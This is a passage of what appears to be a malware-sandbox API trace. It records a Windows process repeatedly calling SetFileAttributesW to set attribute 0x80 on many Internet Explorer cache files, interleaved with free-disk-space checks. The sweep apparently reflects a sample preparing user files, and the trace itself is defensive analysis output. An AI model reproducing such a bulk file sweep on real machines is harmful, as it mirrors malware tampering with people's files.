lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.896] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDk44m[1].png", dwFileAttributes=0x80) returned 1 [0143.899] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.905] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBDWXoC[1].jpg", dwFileAttributes=0x80) returned 1 [0143.907] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.913] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE3NcH[1].jpg", dwFileAttributes=0x80) returned 1 [0143.915] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.920] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE7GLE[1].png", dwFileAttributes=0x80) returned 1 [0143.923] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.928] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBE8aLO[1].jpg", dwFileAttributes=0x80) returned 1 [0143.931] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.936] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEd5bF[1].jpg", dwFileAttributes=0x80) returned 1 [0143.939] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.947] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdDNm[1].jpg", dwFileAttributes=0x80) returned 1 [0143.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.956] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdpyr[1].jpg", dwFileAttributes=0x80) returned 1 [0143.959] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.964] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEdQdv[1].jpg", dwFileAttributes=0x80) returned 1 [0143.967] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.972] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEe62t[1].jpg", dwFileAttributes=0x80) returned 1 [0143.975] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.981] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEedPR[1].jpg", dwFileAttributes=0x80) returned 1 [0143.983] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.988] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTpB[1].jpg", dwFileAttributes=0x80) returned 1 [0143.991] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0143.996] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeTuf[1].jpg", dwFileAttributes=0x80) returned 1 [0143.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.004] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEeU5U[1].jpg", dwFileAttributes=0x80) returned 1 [0144.007] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.013] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf306[1].jpg", dwFileAttributes=0x80) returned 1 [0144.015] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.020] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEf54R[1].jpg", dwFileAttributes=0x80) returned 1 [0144.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.029] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBbH[1].jpg", dwFileAttributes=0x80) returned 1 [0144.032] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.038] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBq0[1].jpg", dwFileAttributes=0x80) returned 1 [0144.040] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.046] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfBrz[1].jpg", dwFileAttributes=0x80) returned 1 [0144.048] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.056] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEfXl6[1].jpg", dwFileAttributes=0x80) returned 1 [0144.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.064] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgEH3[1].jpg", dwFileAttributes=0x80) returned 1 [0144.066] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.073] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgsz3[1].jpg", dwFileAttributes=0x80) returned 1 [0144.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.080] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBEgTxB[1].jpg", dwFileAttributes=0x80) returned 1 [0144.084] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.089] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBo1lFJ[2].png", dwFileAttributes=0x80) returned 1 [0144.092] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.097] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBs47TE[1].png", dwFileAttributes=0x80) returned 1 [0144.099] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.105] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg", dwFileAttributes=0x80) returned 1 [0144.108] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.126] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BByazif[2].jpg", dwFileAttributes=0x80) returned 1 [0144.128] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.145] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt", dwFileAttributes=0x80) returned 1 [0144.148] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.155] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\eula-mac[1].jpg", dwFileAttributes=0x80) returned 1 [0144.158] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.164] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\tecjslog[1].png", dwFileAttributes=0x80) returned 1 [0144.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.183] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\thankyou[1].htm", dwFileAttributes=0x80) returned 1 [0144.186] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.192] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\th[1].jpg", dwFileAttributes=0x80) returned 1 [0144.205] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.212] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\0ff92924-f857-491e-a2ee-c0fe20f0d064[1].jpg", dwFileAttributes=0x80) returned 1 [0144.215] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.225] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\26158[1].png", dwFileAttributes=0x80) returned 1 [0144.228] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.233] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA42x3V[1].png", dwFileAttributes=0x80) returned 1 [0144.237] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.242] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA58NQj[1].png", dwFileAttributes=0x80) returned 1 [0144.245] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.252] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA61Ofl[1].png", dwFileAttributes=0x80) returned 1 [0144.254] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.260] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AA6SFRQ[2].png", dwFileAttributes=0x80) returned 1 [0144.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.268] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1vhm[1].png", dwFileAttributes=0x80) returned 1 [0144.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.283] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAa1xJF[1].png", dwFileAttributes=0x80) returned 1 [0144.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.292] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAlG41q[1].jpg", dwFileAttributes=0x80) returned 1 [0144.294] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.301] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAmin0Z[1].png", dwFileAttributes=0x80) returned 1 [0144.304] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.310] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\AAnhRyj[1].jpg", dwFileAttributes=0x80) returned 1 [0144.315] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.320] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\activityi;src=2542116;cat=Chrom00;type=clien612;ord=2366422437621[1].htm", dwFileAttributes=0x80) returned 1 [0144.323] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.344] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ae8e984b-1820-4a8d-93dc-392ed6563fb6[1].jpg", dwFileAttributes=0x80) returned 1 [0144.347] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.352] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB56XTo[1].png", dwFileAttributes=0x80) returned 1 [0144.355] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0144.360] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB5vO0g[1].png", dwFileAttributes=0x80) returned 1 [0144.362] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, 